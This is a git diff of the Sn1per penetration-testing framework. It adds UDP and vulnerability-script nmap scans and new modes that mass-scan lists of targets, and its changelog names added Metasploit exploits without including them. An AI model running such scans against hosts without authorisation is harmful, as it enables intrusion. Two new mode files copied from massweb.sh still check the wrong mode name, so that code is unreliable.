diff --git a/CHANGELOG.md b/CHANGELOG.md index 460f2424..95456c02 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,4 +1,21 @@ ## CHANGELOG: +* v7.2 - Added experimental OpenVAS API integration +* v7.2 - Improved Burpsuite 2.x API integration with vuln reporting +* v7.2 - Added hunter.io API integration to recon mode scans +* v7.2 - Added Cisco IKE Key Disclosure MSF exploit +* v7.2 - Added JBoss MSF vuln scanner module +* v7.2 - Added Apache CouchDB RCE MSF exploit +* v7.2 - Added IBM Tivoli Endpoint Manager POST Query Buffer Overflow exploit +* v7.2 - Added Java RMI MSF scanner +* v7.2 - New scan mode "vulnscan" +* v7.2 - New scan mode "massportscan" +* v7.2 - New scan mode "massweb" +* v7.2 - New scan mode "masswebscan" +* v7.2 - New scan mode "massvulnscan" +* v7.2 - Added additional Slack API notification settings +* v7.2 - Improved NMap port detection and scan modes +* v7.2 - Fixed issue with Censys API being enabled by default +* v7.2 - Fixed verbose errors in subjack/subover tools * v7.2 - Fixed issue with NMap http scripts not working * v7.1 - Added KeepBlue CVE-2019-0708 MSF scanner * v7.1 - Added automatic workspace generation for single target scans diff --git a/README.md b/README.md index 0da84dd0..8f1070bf 100644 --- a/README.md +++ b/README.md @@ -60,6 +60,7 @@ To obtain a Sn1per Professional license, go to https://xerosecurity.com. - [x] Create individual workspaces to store all scan output ## EXPLOITS: +- [x] Cisco IKE PSK Disclosure - [x] Drupal RESTful Web Services unserialize() SA-CORE-2019-003 - [x] Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts - [x] Drupal: CVE-2018-7600: Remote Code Execution - SA-CORE-2018-002 @@ -72,6 +73,7 @@ To obtain a Sn1per Professional license, go to https://xerosecurity.com. - [x] Apache Struts Content-Type arbitrary command execution (CVE-2017-5638) - [x] Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269 - [x] ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249 +- [x] MS15-034 HTTP.sys Memory Leak - [x] Shellshock Bash Shell remote code execution CVE-2014-6271 - [x] HeartBleed OpenSSL Detection CVE-2014-0160 - [x] MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) @@ -104,7 +106,7 @@ bash install.sh ## UBUNTU/DEBIAN/PARROT INSTALL: ``` -bash install_debian_ubuntu.sh +sudo bash install_debian_ubuntu.sh ``` ## DOCKER INSTALL: diff --git a/modes/discover.sh b/modes/discover.sh index f70478e7..c8a9cf63 100644 --- a/modes/discover.sh +++ b/modes/discover.sh @@ -14,9 +14,9 @@ if [ "$MODE" = "discover" ]; then mkdir $LOOT_DIR/output 2> /dev/null mkdir $LOOT_DIR/scans 2> /dev/null fi - OUT_FILE=$(echo "$TARGET" | tr / -) + OUT_FILE="$(echo $TARGET | tr / -)" echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null - echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$OUTFILE-$MODE.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$OUT_FILE-$MODE.txt 2> /dev/null if [ "$SLACK_NOTIFICATIONS" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" fi @@ -38,7 +38,7 @@ if [ "$MODE" = "discover" ]; then echo -e "$OKRED ____ / /" echo -e "$OKRED \/$RESET" echo "" - OUT_FILE=$(echo "$TARGET" | tr / -) + OUT_FILE=$(echo $TARGET | tr / -) echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING PING DISCOVERY SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" @@ -47,12 +47,17 @@ if [ "$MODE" = "discover" ]; then echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING TCP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -T4 -v -p $QUICK_PORTS -sS $TARGET 2> /dev/null | tee $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt 2>/dev/null + nmap -v -p $QUICK_PORTS -sS $TARGET -Pn 2> /dev/null | tee $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt 2>/dev/null cat $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt | grep open | grep on | awk '{print $6}' > $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING UDP PORT SCAN $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + nmap -v -p $DEFAULT_UDP_PORTS -sU -Pn $TARGET 2> /dev/null | tee $LOOT_DIR/ips/sniper-$OUT_FILE-udp.txt 2>/dev/null + cat $LOOT_DIR/ips/sniper-$OUT_FILE-udp.txt | grep open | grep on | awk '{print $6}' > $LOOT_DIR/ips/sniper-$OUT_FILE-udpips.txt + echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED CURRENT TARGETS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - cat $LOOT_DIR/ips/sniper-$OUT_FILE-ping-sorted.txt $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt 2> /dev/null > $LOOT_DIR/ips/sniper-$OUT_FILE-ips-unsorted.txt + cat $LOOT_DIR/ips/sniper-$OUT_FILE-ping-sorted.txt $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt $LOOT_DIR/ips/sniper-$OUT_FILE-udpips.txt 2> /dev/null > $LOOT_DIR/ips/sniper-$OUT_FILE-ips-unsorted.txt sort -u $LOOT_DIR/ips/sniper-$OUT_FILE-ips-unsorted.txt > $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt cat $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt echo "" diff --git a/modes/flyover.sh b/modes/flyover.sh index 88d1a1af..727280a6 100644 --- a/modes/flyover.sh +++ b/modes/flyover.sh @@ -64,7 +64,7 @@ if [ "$MODE" = "flyover" ]; then webtech -u http://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-http.txt 2> /dev/null & webtech -u https://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-https.txt 2> /dev/null & - nmap -sS -T5 --open -Pn -p $QUICK_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null & + nmap -sS --open -Pn -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null & cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" 2>/dev/null | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null & 2> /dev/null diff --git a/modes/fullportonly.sh b/modes/fullportonly.sh index 77b13a1d..9b5be0b1 100644 --- a/modes/fullportonly.sh +++ b/modes/fullportonly.sh @@ -32,7 +32,7 @@ if [ "$MODE" = "fullportonly" ]; then echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -vv -sT -sV -O -A -T4 --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET + nmap -v -sV -A -O --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET cp -f $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null @@ -40,21 +40,21 @@ if [ "$MODE" = "fullportonly" ]; then echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -Pn -sU -sV -A -T4 -v --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml -p $DEFAULT_UDP_PORTS $TARGET + nmap -Pn -sU -sV -A -v --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml -p $DEFAULT_UDP_PORTS $TARGET sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -Pn -A -v -sV -T4 --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -p $PORT -oX $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET + nmap -v -sV -A -O --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -p $PORT -oX $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -Pn -A -v -sV -T4 -sU --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -p $PORT -Pn -oX $LOOT_DIR/nmap/nmap-$TARGET-udp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET-udp + nmap -Pn -A -v -sV -sU --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -p $PORT -Pn -oX $LOOT_DIR/nmap/nmap-$TARGET-udp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET-udp sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null fi @@ -66,6 +66,7 @@ if [ "$MODE" = "fullportonly" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt" /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt" fi + if [ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" fi diff --git a/modes/fullportscan.sh b/modes/fullportscan.sh index 4f13abcc..dd8f7b85 100644 --- a/modes/fullportscan.sh +++ b/modes/fullportscan.sh @@ -9,7 +9,7 @@ else if [ "$SLACK_NOTIFICATIONS" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" fi - nmap -vv -sT -sV -O -A -T4 --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET + nmap -v -sV -A -O --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET cp -f $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null @@ -20,7 +20,7 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -Pn -sU -sV -A -T4 -v --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -p $DEFAULT_UDP_PORTS -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET-udp + nmap -Pn -sU -sV -A -v --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -p $DEFAULT_UDP_PORTS -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET-udp sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null if [ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]; then diff --git a/modes/massportscan.sh b/modes/massportscan.sh new file mode 100644 index 00000000..9a4e29c6 --- /dev/null +++ b/modes/massportscan.sh @@ -0,0 +1,71 @@ +# MASSWEB MODE ##################################################################################################### +if [ "$MODE" = "massportscan" ]; then + if [ -z "$FILE" ]; then + logo + echo "You need to specify a list of targets (ie. -f ) to scan." + exit + fi + if [ "$REPORT" = "1" ]; then + for a in `cat $FILE`; + do + if [ ! -z "$WORKSPACE" ]; then + args="$args -w $WORKSPACE" + WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE + echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" + mkdir -p $WORKSPACE_DIR 2> /dev/null + mkdir $WORKSPACE_DIR/domains 2> /dev/null + mkdir $WORKSPACE_DIR/screenshots 2> /dev/null + mkdir $WORKSPACE_DIR/nmap 2> /dev/null + mkdir $WORKSPACE_DIR/notes 2> /dev/null + mkdir $WORKSPACE_DIR/reports 2> /dev/null + mkdir $WORKSPACE_DIR/output 2> /dev/null + fi + args="$args -m fullportonly --noreport --noloot" + TARGET="$a" + args="$args -t $TARGET" + echo -e "$OKRED |" + echo -e "$OKRED | |" + echo -e "$OKRED | -/_\-" + echo -e "$OKRED -/_\- ______________(/ . \)______________" + echo -e "$OKRED ____________(/ . \)_____________ \___/ <>" + echo -e "$OKRED <> \___/ <> <>" + echo -e "$OKRED " + echo -e "$OKRED ||" + echo -e "$OKRED <>" + echo -e "$OKRED ||" + echo -e "$OKRED <>" + echo -e "$OKRED ||" + echo -e "$OKRED || BIG" + echo -e "$OKRED _____ __ <> (^)))^ BOOM!" + echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )" + echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )" + echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)" + echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" + echo -e "$OKRED | ||. | | | ||| |||||" + echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" + echo -e "$OKRED | ||. | | | ||| |||||" + echo -e "$OKRED __________________________________________________________" + echo -e "$RESET" + if [ ! -z "$WORKSPACE_DIR" ]; then + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 + else + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt + sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 + fi + args="" + done + fi + if [ "$LOOT" = "1" ]; then + loot + fi + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + exit +fi diff --git a/modes/massvulnscan.sh b/modes/massvulnscan.sh new file mode 100644 index 00000000..07eeabd0 --- /dev/null +++ b/modes/massvulnscan.sh @@ -0,0 +1,71 @@ +# MASSWEB MODE ##################################################################################################### +if [ "$MODE" = "massweb" ]; then + if [ -z "$FILE" ]; then + logo + echo "You need to specify a list of targets (ie. -f ) to scan." + exit + fi + if [ "$REPORT" = "1" ]; then + for a in `cat $FILE`; + do + if [ ! -z "$WORKSPACE" ]; then + args="$args -w $WORKSPACE" + WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE + echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" + mkdir -p $WORKSPACE_DIR 2> /dev/null + mkdir $WORKSPACE_DIR/domains 2> /dev/null + mkdir $WORKSPACE_DIR/screenshots 2> /dev/null + mkdir $WORKSPACE_DIR/nmap 2> /dev/null + mkdir $WORKSPACE_DIR/notes 2> /dev/null + mkdir $WORKSPACE_DIR/reports 2> /dev/null + mkdir $WORKSPACE_DIR/output 2> /dev/null + fi + args="$args -m vulnscan --noreport --noloot" + TARGET="$a" + args="$args -t $TARGET" + echo -e "$OKRED |" + echo -e "$OKRED | |" + echo -e "$OKRED | -/_\-" + echo -e "$OKRED -/_\- ______________(/ . \)______________" + echo -e "$OKRED ____________(/ . \)_____________ \___/ <>" + echo -e "$OKRED <> \___/ <> <>" + echo -e "$OKRED " + echo -e "$OKRED ||" + echo -e "$OKRED <>" + echo -e "$OKRED ||" + echo -e "$OKRED <>" + echo -e "$OKRED ||" + echo -e "$OKRED || BIG" + echo -e "$OKRED _____ __ <> (^)))^ BOOM!" + echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )" + echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )" + echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)" + echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" + echo -e "$OKRED | ||. | | | ||| |||||" + echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" + echo -e "$OKRED | ||. | | | ||| |||||" + echo -e "$OKRED __________________________________________________________" + echo -e "$RESET" + if [ ! -z "$WORKSPACE_DIR" ]; then + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 + else + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt + sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 + fi + args="" + done + fi + if [ "$LOOT" = "1" ]; then + loot + fi + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + exit +fi diff --git a/modes/massweb.sh b/modes/massweb.sh new file mode 100644 index 00000000..2e71936c --- /dev/null +++ b/modes/massweb.sh @@ -0,0 +1,71 @@ +# MASSWEB MODE ##################################################################################################### +if [ "$MODE" = "massweb" ]; then + if [ -z "$FILE" ]; then + logo + echo "You need to specify a list of targets (ie. -f ) to scan." + exit + fi + if [ "$REPORT" = "1" ]; then + for a in `cat $FILE`; + do + if [ ! -z "$WORKSPACE" ]; then + args="$args -w $WORKSPACE" + WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE + echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" + mkdir -p $WORKSPACE_DIR 2> /dev/null + mkdir $WORKSPACE_DIR/domains 2> /dev/null + mkdir $WORKSPACE_DIR/screenshots 2> /dev/null + mkdir $WORKSPACE_DIR/nmap 2> /dev/null + mkdir $WORKSPACE_DIR/notes 2> /dev/null + mkdir $WORKSPACE_DIR/reports 2> /dev/null + mkdir $WORKSPACE_DIR/output 2> /dev/null + fi + args="$args -m web --noreport --noloot" + TARGET="$a" + args="$args -t $TARGET" + echo -e "$OKRED |" + echo -e "$OKRED | |" + echo -e "$OKRED | -/_\-" + echo -e "$OKRED -/_\- ______________(/ . \)______________" + echo -e "$OKRED ____________(/ . \)_____________ \___/ <>" + echo -e "$OKRED <> \___/ <> <>" + echo -e "$OKRED " + echo -e "$OKRED ||" + echo -e "$OKRED <>" + echo -e "$OKRED ||" + echo -e "$OKRED <>" + echo -e "$OKRED ||" + echo -e "$OKRED || BIG" + echo -e "$OKRED _____ __ <> (^)))^ BOOM!" + echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )" + echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )" + echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)" + echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" + echo -e "$OKRED | ||. | | | ||| |||||" + echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" + echo -e "$OKRED | ||. | | | ||| |||||" + echo -e "$OKRED __________________________________________________________" + echo -e "$RESET" + if [ ! -z "$WORKSPACE_DIR" ]; then + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 + else + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt + sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 + fi + args="" + done + fi + if [ "$LOOT" = "1" ]; then + loot + fi + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + exit +fi diff --git a/modes/masswebscan.sh b/modes/masswebscan.sh new file mode 100644 index 00000000..ad8f7328 --- /dev/null +++ b/modes/masswebscan.sh @@ -0,0 +1,71 @@ +# MASSWEB MODE ##################################################################################################### +if [ "$MODE" = "massweb" ]; then + if [ -z "$FILE" ]; then + logo + echo "You need to specify a list of targets (ie. -f ) to scan." + exit + fi + if [ "$REPORT" = "1" ]; then + for a in `cat $FILE`; + do + if [ ! -z "$WORKSPACE" ]; then + args="$args -w $WORKSPACE" + WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE + echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" + mkdir -p $WORKSPACE_DIR 2> /dev/null + mkdir $WORKSPACE_DIR/domains 2> /dev/null + mkdir $WORKSPACE_DIR/screenshots 2> /dev/null + mkdir $WORKSPACE_DIR/nmap 2> /dev/null + mkdir $WORKSPACE_DIR/notes 2> /dev/null + mkdir $WORKSPACE_DIR/reports 2> /dev/null + mkdir $WORKSPACE_DIR/output 2> /dev/null + fi + args="$args -m webscan --noreport --noloot" + TARGET="$a" + args="$args -t $TARGET" + echo -e "$OKRED |" + echo -e "$OKRED | |" + echo -e "$OKRED | -/_\-" + echo -e "$OKRED -/_\- ______________(/ . \)______________" + echo -e "$OKRED ____________(/ . \)_____________ \___/ <>" + echo -e "$OKRED <> \___/ <> <>" + echo -e "$OKRED " + echo -e "$OKRED ||" + echo -e "$OKRED <>" + echo -e "$OKRED ||" + echo -e "$OKRED <>" + echo -e "$OKRED ||" + echo -e "$OKRED || BIG" + echo -e "$OKRED _____ __ <> (^)))^ BOOM!" + echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )" + echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )" + echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)" + echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" + echo -e "$OKRED | ||. | | | ||| |||||" + echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" + echo -e "$OKRED | ||. | | | ||| |||||" + echo -e "$OKRED __________________________________________________________" + echo -e "$RESET" + if [ ! -z "$WORKSPACE_DIR" ]; then + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 + else + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt + sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 + fi + args="" + done + fi + if [ "$LOOT" = "1" ]; then + loot + fi + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + exit +fi diff --git a/modes/normal.sh b/modes/normal.sh index dfdc68ad..65028ae7 100644 --- a/modes/normal.sh +++ b/modes/normal.sh @@ -143,27 +143,27 @@ port_5984=`grep 'portid="5984"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_7001=`grep 'portid="7001"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` 